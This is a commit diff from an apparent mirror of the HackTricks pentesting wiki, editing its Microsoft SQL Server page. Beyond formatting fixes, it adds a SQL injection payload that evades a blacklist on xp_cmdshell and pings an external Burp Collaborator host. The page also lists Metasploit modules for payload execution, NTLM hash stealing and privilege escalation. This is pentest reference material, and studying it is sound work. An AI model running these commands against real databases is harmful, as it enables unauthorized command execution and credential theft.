mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [#2811] mssql trick
This commit is contained in:
parent
3896ea2eb9
commit
b150f0adc0
|
@ -10,8 +10,8 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
|
||||
## Basic Information
|
||||
|
||||
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational_database_management_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database_server), it is a [software product](https://en.wikipedia.org/wiki/Software_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
|
||||
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server).
|
||||
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational\_database\_management\_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database\_server), it is a [software product](https://en.wikipedia.org/wiki/Software\_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software\_application)—which may run either on the same computer or on another computer across a network (including the Internet).\
|
||||
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server).
|
||||
|
||||
**Default port:** 1433
|
||||
|
||||
|
@ -82,7 +82,7 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
|
|||
msf> use windows/manage/mssql_local_auth_bypass
|
||||
```
|
||||
|
||||
### \*\*\*\*[**Brute force**](../brute-force.md#sql-server)\*\*\*\*
|
||||
### [**Brute force**](../brute-force.md#sql-server)
|
||||
|
||||
## Tricks
|
||||
|
||||
|
@ -102,6 +102,9 @@ sp_configure 'xp_cmdshell', '1'
|
|||
RECONFIGURE
|
||||
# Quickly check what the service account is via xp_cmdshell
|
||||
EXEC master..xp_cmdshell 'whoami'
|
||||
|
||||
# Bypass blackisted "EXEC xp_cmdshell"
|
||||
‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ —
|
||||
```
|
||||
|
||||
### NTLM Service Hash gathering
|
||||
|
@ -117,11 +120,11 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
|
|||
|
||||
### Abusing MSSQL trusted Links
|
||||
|
||||
\*\*\*\*[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
|
||||
[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
|
||||
|
||||
### **Read files executing scripts (Python and R)**
|
||||
|
||||
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands.
|
||||
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands.
|
||||
|
||||
Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
|
||||
|
||||
|
@ -143,9 +146,9 @@ print(sys.version)
|
|||
GO
|
||||
```
|
||||
|
||||
### From db_owner to sysadmin
|
||||
### From db\_owner to sysadmin
|
||||
|
||||
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
|
||||
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db\_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
|
||||
|
||||
```bash
|
||||
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
|
||||
|
|
Loading…
Reference in a new issue